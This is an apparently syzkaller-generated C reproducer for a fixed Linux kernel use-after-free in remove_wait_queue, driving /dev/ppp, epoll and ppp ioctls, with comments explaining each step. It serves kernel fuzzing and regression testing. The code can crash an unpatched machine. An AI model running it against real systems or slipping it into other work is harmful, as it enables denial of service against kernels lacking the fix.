// KASAN: use-after-free Read in remove_wait_queue (2)
// https://syzkaller.appspot.com/bug?id=83bec290888c08680fb630ec3a2bc87d0ad4b73f
// status:fixed
// autogenerated by syzkaller (http://github.com/google/syzkaller)
| |
| #define _GNU_SOURCE |
| #include <endian.h> |
| #include <stdint.h> |
| #include <string.h> |
| #include <sys/syscall.h> |
| #include <unistd.h> |
| |
/*
 * Descriptors harvested by loop(): r[0] is the /dev/ppp descriptor, r[1]
 * the epoll descriptor. Both start as all-ones, i.e. -1 when handed back to
 * the kernel as an fd, so a failed open/create makes the later syscalls
 * fail with a bad descriptor instead of acting on a stale number.
 */
uint64_t r[2] = {UINT64_MAX, UINT64_MAX};
/* Keep a syscall result only when it is a valid descriptor (not -1). */
static void record_fd(long res, uint64_t *slot)
{
  if (res != -1)
    *slot = res;
}

/*
 * Reproducer body: the exact syscall sequence syzkaller recorded for the
 * "KASAN: use-after-free Read in remove_wait_queue (2)" report named in the
 * file header (marked fixed upstream). It opens /dev/ppp, creates a ppp
 * unit, registers the descriptor with epoll, then attaches a channel.
 *
 * Every scratch address below lies inside the 16 MiB anonymous mapping that
 * main() installs at 0x20000000; calling loop() without that mapping faults
 * on the first memcpy. The epoll_event stores are deliberately unaligned
 * (0x201b3073 / 0x201b3077), which x86 tolerates but a strict-alignment
 * target would not. Results are not acted on beyond recording descriptors:
 * the sequence is replayed verbatim, so a failed step just feeds -1 into
 * the later calls. On an unpatched kernel this can crash the machine; use it
 * only as a regression check on kernels carrying the fix.
 */
void loop()
{
  /* Scratch locations inside the 0x20000000..0x21000000 mapping. */
  const uintptr_t ppp_path_addr = 0x20b31ff7; /* "/dev/ppp" + NUL, ending on a page boundary */
  const uintptr_t newunit_arg = 0x20000100;   /* int argument of the new-unit ioctl */
  const uintptr_t epoll_ev_addr = 0x201b3073; /* struct epoll_event: u32 events, u64 data at +4 */
  const uintptr_t attchan_arg = 0x20d1df52;   /* int argument of the attach-channel ioctl */

  /* unshare(CLONE_FILES = 0x400): give this process a private fd table. */
  (void)syscall(__NR_unshare, 0x400);

  /* openat(AT_FDCWD (-100), "/dev/ppp", flags 0, mode 0) */
  memcpy((void*)ppp_path_addr, "/dev/ppp", 9);
  record_fd(syscall(__NR_openat, 0xffffffffffffff9c, ppp_path_addr, 0, 0), &r[0]);

  /* ioctl(ppp, 0xc004743e) — PPPIOCNEWUNIT, _IOWR('t', 62, int): allocate a unit. */
  (void)syscall(__NR_ioctl, r[0], 0xc004743e, newunit_arg);

  record_fd(syscall(__NR_epoll_create, 0x1ffe), &r[1]);

  /* epoll_event { events = 0, data = 0 }, laid out as the packed x86-64 struct. */
  *(uint32_t*)epoll_ev_addr = 0;
  *(uint64_t*)(epoll_ev_addr + 4) = 0;
  /* epoll_ctl(epfd, EPOLL_CTL_ADD (1), ppp, &ev): puts ppp's wait queue in play. */
  (void)syscall(__NR_epoll_ctl, r[1], 1, r[0], epoll_ev_addr);

  /* ioctl(ppp, 0x4004743c) — PPPIOCATTCHAN, _IOW('t', 60, int): attach a channel. */
  (void)syscall(__NR_ioctl, r[0], 0x4004743c, attchan_arg);
}
| |
/*
 * Entry point: install the 16 MiB scratch mapping loop() writes into, then
 * replay the recorded sequence once.
 */
int main()
{
  /*
   * mmap(0x20000000, 16 MiB, PROT_READ|PROT_WRITE (3),
   *      MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS (0x32), fd -1, offset 0).
   * MAP_FIXED replaces anything already mapped in that range. The result is
   * not checked: if the mapping fails, loop() faults on its first store
   * instead of continuing.
   */
  const uintptr_t scratch_base = 0x20000000;
  const size_t scratch_len = 0x1000000;
  (void)syscall(__NR_mmap, scratch_base, scratch_len, 3, 0x32, -1, 0);

  loop();
  return 0;
}